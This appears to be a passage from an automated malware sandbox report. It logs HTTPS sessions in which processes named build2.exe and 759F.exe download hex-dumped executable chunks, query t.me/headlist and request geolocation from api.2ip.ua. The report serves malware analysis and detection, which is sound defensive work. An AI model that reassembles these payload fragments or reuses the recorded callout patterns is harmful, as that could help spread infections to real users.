2023-06-21 02:28:05 UTC	315	IN	Data Raw: 32 30 30 30 0d 0a 4c c9 87 ae e3 79 bd e0 f1 da eb 6b 05 df ab eb be 47 d1 a8 4c d3 4f 54 a3 d5 29 17 9a 64 81 b7 08 9d 80 33 30 84 e3 d9 bd 97 68 de 23 4a 1d b8 2c 44 a9 de 36 e0 d1 6f f9 63 82 24 a7 94 68 93 f2 43 f2 76 bf 8e de c1 30 38 10 6a 56 7a 04 af 33 2e d9 a9 ab fc f5 98 0a 69 d0 f8 f3 8e c1 08 61 5c f9 5a c9 99 29 7e 42 76 5a 81 7d d4 52 53 a6 f7 8b 01 73 84 53 0f e7 79 ad 58 61 f9 d9 40 96 33 99 2a de a4 2a f1 ca dc 7c 3f 9f f5 99 42 70 d7 ce 25 e1 0d bf e5 c6 ff 0c 77 be 32 94 64 3a d8 4f 3f 3e 3a d7 ba ba 85 79 6f 01 eb 68 6d 50 73 11 c8 15 d1 f9 06 d2 68 ca f7 de 04 c4 a4 0f db 9d 1d b8 67 3b c6 13 90 5a 86 ef 29 39 47 34 ac a1 21 13 bc f8 6d ac d7 9c ef 74 e9 db c0 75 8e 60 de a4 85 a2 6d 89 9e 6d e4 e9 50 72 ba 75 6e 1a 81 b9 37 52 5e 10 Data Ascii: 2000LykGLOT)d30h#J,D6oc$hCv08jVz3.ia\Z)~BvZ}RSsSyXa@3**\|?Bp%w2d:O?>:yohmPshg;Z)9G4!mtu`mmPrun7R^
2023-06-21 02:28:05 UTC	323	IN	Data Raw: 8f 75 93 cb e4 92 Data Ascii: u
2023-06-21 02:28:05 UTC	323	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:06 UTC	324	IN	Data Raw: 32 30 30 30 0d 0a e9 2f dc 7c 33 1a c3 9a 68 a8 94 ec 30 46 4b dd 80 2f e0 c2 a6 54 ba 7c a2 f4 3a 25 70 22 43 de 81 6a fd 27 68 63 86 e4 51 02 a0 53 c6 88 89 9d 38 5e 94 25 8f 11 56 28 02 9e 2b e0 7c 38 cd 15 29 a6 e3 23 39 51 b8 91 b2 1a 9e 51 2e 4f 14 87 a5 bf 22 21 47 aa e8 8e 49 e0 27 ae dc a3 a9 4c 24 56 7c e9 a0 31 bf b1 6c 82 a1 2e 1b 32 c6 03 28 fa 1f 4a bd da 41 b4 8f cc c6 ee db 35 c8 3e 26 6c b5 c2 12 fb 14 ff c9 29 8e 50 ef 34 70 47 4f 0e 3f c3 be 62 d3 19 7b c0 b4 d0 8b f1 41 8f ba 9a ba 51 1f 49 b4 a5 5b 12 cf e1 25 f2 4b 81 17 b4 ac d9 78 02 7d 1b f9 76 8c 00 a0 35 ca d5 f1 eb 58 c9 79 da 41 2d 7a 18 b9 a3 03 9c 3b 55 c6 c5 ce 7e 13 99 e8 4d 29 33 e7 19 36 60 02 e6 3c 60 48 d1 46 cf 0d 3c fb 8f 5e b4 a7 17 2f df 27 43 43 23 33 e2 83 b7 25 Data Ascii: 2000/\|3h0FK/T\|:%p"Cj'hcQS8^%V(+\|8)#9QQ.O"!GI'L$V\|1l.2(JA5>&l)P4pGO?b{AQI[%Kx}v5XyA-z;U~M)36`<`HF<^/'CC#3%
2023-06-21 02:28:06 UTC	332	IN	Data Raw: 86 72 9c e9 c7 b0 Data Ascii: r
2023-06-21 02:28:06 UTC	332	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:06 UTC	332	IN	Data Raw: 32 30 30 30 0d 0a 97 8c 85 26 28 32 54 84 ab 03 3e c2 08 f0 1e 2f 20 20 93 00 2e fb 44 88 ca d9 e0 02 0d da 6c e4 b5 8b 8e f3 a0 99 62 c5 5d a9 76 19 76 82 d5 04 ac 24 e3 19 e6 95 ae b9 4b 62 2f 2a fd f5 74 5e 58 46 50 42 48 00 49 84 4c 78 4a 07 5c 2e 5b 02 a1 64 d1 b9 ac 19 1c 31 59 d5 f0 eb 52 50 bf 03 35 35 b5 eb da 14 51 ce 09 57 8b d1 cb 2c 88 8a be 25 bf 82 d9 f6 49 b5 fc 89 cd 61 2b e9 f4 c9 2a 42 e9 6a d9 2e 2d 4f 3f b6 6f 08 c4 0d 6a 53 0f 26 01 0f 6b 12 b5 4f 4d fc e5 f4 36 70 0c 1f 58 0d 4e 45 96 00 83 ee 10 40 ed 4a b4 86 af 4a 5a ab 7c 28 cf 71 62 61 63 c9 e4 ca 1b 48 83 29 ce ee db f3 89 ba a0 05 dd 41 fb 38 7c fd fb 71 26 96 dc e4 25 e6 5c 2d b1 5d 29 50 fb 1c 1d 84 e9 a0 12 78 22 af 18 b9 ff 50 8b 8e 73 86 fe d6 d8 9c 28 05 92 1d 0c fe 93 Data Ascii: 2000&(2T>/ .Dlb]vv$Kb/t^XFPBHILxJ\.[d1YRP55QW,%Ia+Bj.-O?ojS&kOM6pXNE@JJZ\|(qbacH)A8\|q&%\-])Px"Ps(
2023-06-21 02:28:06 UTC	340	IN	Data Raw: 51 52 a0 bf e8 91 Data Ascii: QR
2023-06-21 02:28:06 UTC	340	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:06 UTC	340	IN	Data Raw: 32 30 30 30 0d 0a 55 d7 62 74 2b 52 b3 a5 45 35 4e 02 0e 98 97 62 0f aa 66 48 92 ca 3c 76 15 74 7f f3 9e b1 c3 2e 19 dd 13 9c 36 7c d6 fb d8 6d 64 34 48 28 4c 90 f2 ad e2 25 e3 3a 44 c0 96 38 cf c3 3e 22 83 54 b5 1d 16 10 8d 34 81 d2 44 75 de 8c e4 21 c7 3e 71 d3 e9 8b ba f8 82 46 4c 90 58 55 78 71 12 80 64 79 cd c6 92 c2 4d 76 3b 4f 0e fc 1e 8e 45 17 cf 77 5b 1c a2 ca aa 13 55 6f f2 5f 55 c0 52 62 49 fe 75 75 d8 b6 17 1e 0d 99 d4 15 44 ab f8 ae b0 c9 2f 3d d4 76 73 94 bd b7 16 0a 25 a2 b3 b6 15 b0 60 94 63 54 38 09 13 e2 21 a5 92 1f 13 a4 99 b1 2e d5 fa 57 aa 39 4b 57 78 8b ab 1d bf 11 35 97 dc 25 cf 36 e0 76 eb 38 4d d8 4b 02 e1 40 00 bd 11 c1 d1 18 2b c3 a3 22 db dc 26 5d 71 6d 1c 61 55 2a 0d f6 62 b4 e9 d6 3e 7d a0 8a ef e4 bc 88 cc ef 15 18 f6 f2 08 Data Ascii: 2000Ubt+RE5NbfH<vt.6\|md4H(L%:D8>"T4Du!>qFLXUxqdyMv;OEw[Uo_URbIuuD/=vs%`cT8!.W9KWx5%6v8MK@+"&]qmaU*b>}
2023-06-21 02:28:06 UTC	348	IN	Data Raw: 00 56 9b 03 3b f7 Data Ascii: V;
2023-06-21 02:28:06 UTC	348	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:06 UTC	348	IN	Data Raw: 31 66 66 38 0d 0a 85 87 a5 91 8f 30 54 00 1d 44 91 36 87 31 83 92 b4 6a fb 62 5f d2 b9 f3 a6 66 19 74 86 71 a5 c1 10 4d c7 54 ca b9 b1 ca 54 af 7c ca e6 91 9e 34 22 99 3e 19 91 83 03 bc c4 15 29 da d7 09 11 e8 c9 87 dc c0 8f 09 2b 2c c6 94 34 6d 70 35 87 c7 0b c2 ab ea f6 bd 24 1f 8e 81 c1 16 29 1d c3 a9 dc 1b 0d 13 9c e7 18 8d 1b 84 a7 b9 c7 df 97 fc d3 0e ef 3f 89 44 9b 8b 7f 8a ca 0b a3 4b 2f 97 d7 18 f9 b3 12 f0 a2 64 e4 42 b4 b8 d3 a1 d1 c8 7d c0 ae 57 9b 5e 89 d4 83 c0 30 a6 eb 67 73 5e 8e 47 1d 33 da 4f 94 01 5f 8f ca c0 54 84 f9 f9 0c 61 17 12 68 d9 44 07 b3 51 0d 81 9e f5 a4 cb df ee 03 e2 5f 8b 30 39 be 9a 91 a1 dd 0f 67 fc 7e 30 4d d4 88 d3 d5 d9 a3 34 f1 3e 8c f5 bd ca 8f 6c 6d 77 4f cf aa bf 1a 36 9f 6f 73 c6 fd 2f 51 e9 8d 55 23 02 5a 9a be Data Ascii: 1ff80TD61jb_ftqMTT\|4">)+,4mp5$)?DK/dB}W^0gs^G3O_TahDQ_09g~0M4>lmwO6os/QU#Z
2023-06-21 02:28:06 UTC	356	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2023-06-21 02:28:07 UTC	356	IN	Data Raw: 6b 6e 3d da 83 89 a9 57 0c b4 16 f2 ba ec 98 4d e4 95 8e 53 6d 03 61 f0 b5 6c 7c 0a 41 b1 65 2a 2a a4 91 e3 3d 64 68 d5 db 09 fe 2d cf e6 2f 43 58 2d 2e a8 39 62 b0 02 a7 67 0a 62 96 49 97 4a 7c 5a 71 61 a6 c6 16 5e b8 37 e2 a9 d4 df 99 a3 9e d1 57 fc 0a 24 c2 9e e7 9e a2 55 e8 4c 10 55 d7 d4 59 2f 9a 6d 68 14 c5 64 49 71 b7 42 2b c1 4c b6 c7 b3 8f ec d9 26 a7 8f 69 5d b7 67 74 d1 a4 72 a2 94 b6 0b 2b cd 1f 66 73 66 d5 28 5f cf b8 45 9b b9 2d 7e 36 1f ad 5b 4a 9e 36 48 a4 12 bb 58 4b 46 57 2e ea a8 10 e1 a1 fd 78 48 c0 eb 02 e4 21 0a b2 73 67 f5 e7 2f e7 48 86 a0 f2 db 39 d2 70 ac 3c db a3 95 59 2c c0 9c dc 7c 62 12 a5 ae c8 fa c7 99 a2 40 a4 ed 68 4b 53 bd 4d 2d cb 8f cf 55 2d 9f 6b 25 18 8a 93 42 4f 96 15 d6 3c 1e 13 0a 6d 21 15 3f 18 ee 9e 78 f6 3d 52 Data Ascii: kn=WMSmal\|Ae**=dh-/CX-.9bgbIJ\|Zqa^7W$ULUY/mhdIqB+L&i]gtr+fsf(_E-~6[J6HXKFW.xH!sg/H9p<Y,\|b@hKSM-U-k%BO<m!?x=R
2023-06-21 02:28:07 UTC	364	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:07 UTC	364	IN	Data Raw: 32 30 30 30 0d 0a a8 81 05 57 0a dd a6 d7 17 42 35 34 30 42 19 23 3c 1c b4 e2 91 20 29 3d cf 41 ad 70 f7 85 51 0d 4e e9 ea 26 ab ca 27 a3 c4 e8 46 4d 04 8d 81 18 04 46 9f 12 b1 10 d8 c8 a9 0e 4d 09 fe 5f d7 28 40 ae 2d 25 c3 d1 03 b8 91 b1 c1 ae a3 ad 47 65 db 67 0c b7 4c 3c 6d b1 84 8e 5e 17 dd e2 8e fc 71 08 89 17 a4 9c 79 c3 c5 4d 4c 21 18 37 67 81 21 53 ad bd 09 78 8e 23 75 4c fb 42 d7 dd 07 0b a6 8a 8b 60 19 28 97 4f 1c 22 2c 27 ac f4 d5 8b 8f e2 93 67 f5 c9 32 a3 1e 63 99 79 07 d7 51 12 b9 33 a2 26 ce 4a 3e 9f 77 5f 2d 73 0a 06 67 0a de 5f 68 21 b4 f3 d0 80 f7 ed 5c 49 88 18 a3 01 e0 ab 09 12 d9 d4 f3 29 dd 62 10 11 37 04 17 79 9c 67 69 95 3b 00 b6 03 b3 c7 28 84 ba 2e 4f ee 61 c5 46 e4 9e 49 ae 30 51 6a 94 b6 d8 ab ed 84 1c 6b ba ae 19 dd c4 04 21 Data Ascii: 2000WB540B#< )=ApQN&'FMFM_(@-%GegL<m^qyML!7g!Sx#uLB`(O",'g2cyQ3&J>w_-sg_h!\I)b7ygi;(.OaFI0Qjk!
2023-06-21 02:28:07 UTC	372	IN	Data Raw: 70 64 61 74 65 52 Data Ascii: pdateR
2023-06-21 02:28:07 UTC	372	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:09 UTC	372	IN	Data Raw: 32 30 30 30 0d 0a 65 73 6f 75 72 63 65 41 00 00 49 03 50 75 72 67 65 43 6f 6d 6d 00 a7 01 47 65 74 43 75 72 72 65 6e 74 44 69 72 65 63 74 6f 72 79 41 00 00 60 03 52 65 61 64 43 6f 6e 73 6f 6c 65 49 6e 70 75 74 57 00 2a 01 46 69 6e 64 46 69 72 73 74 56 6f 6c 75 6d 65 57 00 00 aa 01 47 65 74 43 75 72 72 65 6e 74 50 72 6f 63 65 73 73 49 64 00 4b 45 52 4e 45 4c 33 32 2e 64 6c 6c 00 00 69 02 53 65 74 43 61 72 65 74 50 6f 73 00 6d 01 47 65 74 53 79 73 43 6f 6c 6f 72 42 72 75 73 68 00 00 e1 01 4c 6f 61 64 4d 65 6e 75 57 00 38 00 43 68 61 72 55 70 70 65 72 42 75 66 66 41 00 00 34 00 43 68 61 72 54 6f 4f 65 6d 42 75 66 66 41 00 00 55 53 45 52 33 32 2e 64 6c 6c 00 00 ed 01 47 65 74 50 6f 6c 79 46 69 6c 6c 4d 6f 64 65 00 47 44 49 33 32 2e 64 6c 6c 00 29 02 52 65 61 Data Ascii: 2000esourceAIPurgeCommGetCurrentDirectoryA`ReadConsoleInputW*FindFirstVolumeWGetCurrentProcessIdKERNEL32.dlliSetCaretPosmGetSysColorBrushLoadMenuW8CharUpperBuffA4CharToOemBuffAUSER32.dllGetPolyFillModeGDI32.dll)Rea
2023-06-21 02:28:09 UTC	380	IN	Data Raw: 00 00 00 00 00 00 Data Ascii:
2023-06-21 02:28:09 UTC	380	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:09 UTC	380	IN	Data Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 2000
2023-06-21 02:28:09 UTC	388	IN	Data Raw: 00 00 00 00 00 00 Data Ascii:
2023-06-21 02:28:09 UTC	388	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:10 UTC	388	IN	Data Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 2000
2023-06-21 02:28:10 UTC	396	IN	Data Raw: 00 7f 00 00 00 7f Data Ascii:
2023-06-21 02:28:10 UTC	396	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:11 UTC	396	IN	Data Raw: 32 30 30 30 0d 0a 80 00 00 ff 80 00 00 ff c0 00 01 ff e0 00 03 ff f0 00 03 ff f0 00 07 ff e0 00 1f ff e0 00 3f ff e0 00 3f ff e0 00 3f ff e0 00 3f ff e0 00 7f ff f0 00 7f ff fc 01 ff ff ff ff ff ff ff ff ff ff 28 00 00 00 10 00 00 00 20 00 00 00 01 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 7d 7b 00 7a 82 80 00 80 81 7d 00 79 84 7a 00 80 7e 80 00 7b 7f 7f 00 83 7f 7e 00 7b 83 85 00 7a 7d 7c 00 7c 7e 83 00 84 7f 83 00 7b 80 82 00 7c 7d 83 00 7f 80 7c 00 80 79 7b 00 79 7e 7b 00 7c 7f 81 00 83 83 7f 00 7d 7c 7a 00 7e 81 7e 00 79 7c 81 00 80 7d 7e 00 80 7b 7f 00 84 82 84 00 7c 85 7d 00 7e 84 7f 00 7c 80 83 00 7d 7d 83 00 81 82 7a 00 7e 7d 82 00 80 7a 7d 00 7d 84 7e 00 7b 7c 7f 00 81 84 7b 00 81 7c 82 00 7c 7e 84 00 7d Data Ascii: 2000????( }{z}yz~{~{z}\|\|~{\|}\|y{y~{\|}\|z~~y\|}~{\|}~\|}}z~}z}}~{\|{\|\|~}
2023-06-21 02:28:11 UTC	404	IN	Data Raw: 81 83 80 83 81 85 Data Ascii:
2023-06-21 02:28:11 UTC	404	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:11 UTC	404	IN	Data Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7e 7e 83 7d 81 82 82 7f 7d 83 80 80 7c 7c 82 82 7d 83 7f 7f 7d 7e 7f 81 81 7a 82 80 83 80 7d 84 7b 7e 83 80 83 7c 7f 7d 85 80 82 83 7b 82 7d 7f 82 7f 83 7a 7f 7f 83 84 82 7d 7b 82 80 84 7e 7f 7f 7c 7f 7c 7e 7e 83 83 86 82 7f 7b 81 7f 80 81 82 7e 7f 7e 83 84 84 7a 7e 7d 82 7c 80 7f 82 7f 7f 7c 83 84 7e 7f 82 84 84 7d 83 7e 84 7b 7f 7b 7b 84 7f 7e 7c 7b 7f 81 7b 80 7f 80 7b 7a 81 7e 7c 80 79 81 81 7a 7d 7d 82 7c 81 7c 7f 82 80 7c 82 79 7e 83 84 81 7d 81 7b 82 83 7c 7d 84 80 7f 80 7e 7b 7d 7f 7b 85 7c 81 81 7d 80 81 82 83 83 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7f 83 7b 7d 80 81 83 7b 7d 79 85 81 81 7f 82 7f 79 7f 7c 7a 7f 85 7f 82 84 80 7e 80 81 7a 80 82 7f 82 81 83 7f Data Ascii: 2000~~}}\|\|}}~z}{~\|}{}z}{~\|\|~~{~~z~}\|\|~}~{{{~\|{{{z~\|yz}}\|\|\|y~}{\|}~{}{\|}{}{}yy\|z~z
2023-06-21 02:28:11 UTC	412	IN	Data Raw: 7c 83 7f 80 83 7f Data Ascii: \|
2023-06-21 02:28:11 UTC	412	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:12 UTC	412	IN	Data Raw: 31 66 66 38 0d 0a 83 79 80 7b 84 85 81 7a 83 81 7c 84 83 83 7d 82 80 7e 82 7d 81 85 7e 7d 7f 84 7d 82 82 7f 83 81 7f 80 81 82 7c 83 81 80 84 7f 7f 81 7f 7c 80 82 85 80 83 7d 83 7c 7b 86 00 00 00 00 00 00 00 00 80 85 7b 82 85 85 81 82 7f 7e 80 7c 80 82 83 84 80 83 7e 7b 7f 7e 7e 80 82 83 84 7a 7f 83 86 7e 82 84 79 7c 7b 7c 7d 85 80 7d 7c 80 7c 7f 7a 80 79 7f 7d 7c 82 80 82 7e 80 7d 81 84 7c 7d 7a 84 7c 83 7f 84 7e 7b 85 81 82 7a 7b 82 7e 84 82 7c 83 7b 7a 7d 80 80 7c 83 00 00 00 00 00 00 00 00 81 7c 7b 81 7b 7c 80 85 81 7a 81 7d 7b 7e 7a 81 7e 82 82 7b 7b 7f 7d 7d 81 7d 83 83 85 81 83 7f 83 83 7b 7a 7f 7f 7e 7b 81 81 7e 7c 7e 80 82 81 80 84 7f 7d 83 80 7e 80 7c 81 7f 82 83 79 81 7c 7e 83 83 84 81 85 82 7d 82 7c 81 83 80 7f 82 82 83 7c 82 81 7f 7f 81 7f 00 Data Ascii: 1ff8y{z\|}~}~}}\|\|}\|{{~\|~{~~z~y\|{\|}}\|\|zy}\|~}\|}z\|~{z{~\|{z}\|\|{{\|z}{~z~{{}}}{z~{~\|~}~\|y\|~}\|\|
2023-06-21 02:28:12 UTC	420	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2023-06-21 02:28:12 UTC	420	IN	Data Raw: 68 00 65 00 63 00 61 00 78 00 75 00 72 00 20 00 79 00 75 00 76 00 65 00 63 00 65 00 70 00 20 00 78 00 69 00 6c 00 6f 00 6e 00 75 00 79 00 61 00 77 00 75 00 20 00 64 00 69 00 68 00 75 00 66 00 6f 00 77 00 69 00 73 00 69 00 78 00 20 00 76 00 75 00 68 00 75 00 6a 00 6f 00 20 00 72 00 65 00 68 00 61 00 6d 00 75 00 78 00 20 00 6e 00 75 00 63 00 75 00 79 00 69 00 6b 00 69 00 6c 00 65 00 20 00 79 00 75 00 73 00 69 00 6b 00 69 00 70 00 75 00 6c 00 69 00 79 00 6f 00 6d 00 6f 00 20 00 67 00 75 00 62 00 61 00 66 00 75 00 63 00 65 00 6e 00 69 00 77 00 75 00 6d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: hecaxur yuvecep xilonuyawu dihufowisix vuhujo rehamux nucuyikile yusikipuliyomo gubafuceniwum
2023-06-21 02:28:12 UTC	428	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:12 UTC	428	IN	Data Raw: 34 31 38 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 418

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.3	49726	149.154.167.99	443	C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe

Timestamp	kBytes transferred	Direction	Data
2023-06-21 02:28:02 UTC	221	OUT	GET /headlist HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0 Host: t.me
2023-06-21 02:28:02 UTC	229	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 21 Jun 2023 02:28:02 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12354 Connection: close Set-Cookie: stel_ssid=e96a9d9fbfb9d3de5c_4986863142029452830; expires=Thu, 22 Jun 2023 02:28:02 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2023-06-21 02:28:02 UTC	230	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 68 65 61 64 6c 69 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @headlist</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.pare

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.3	49729	162.0.217.254	443	C:\Users\user\AppData\Local\Temp\759F.exe

Timestamp	kBytes transferred	Direction	Data
2023-06-21 02:28:04 UTC	306	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2023-06-21 02:28:04 UTC	306	IN	HTTP/1.1 429 Too Many Requests Date: Wed, 21 Jun 2023 02:28:04 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block; report=... Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-06-21 02:28:04 UTC	307	IN	Data Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0 Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.3	49730	162.0.217.254	443	C:\Users\user\AppData\Local\Temp\759F.exe

Timestamp	kBytes transferred	Direction	Data
2023-06-21 02:28:05 UTC	323	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2023-06-21 02:28:05 UTC	323	IN	HTTP/1.1 429 Too Many Requests Date: Wed, 21 Jun 2023 02:28:05 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block; report=... Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-06-21 02:28:05 UTC	324	IN	Data Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 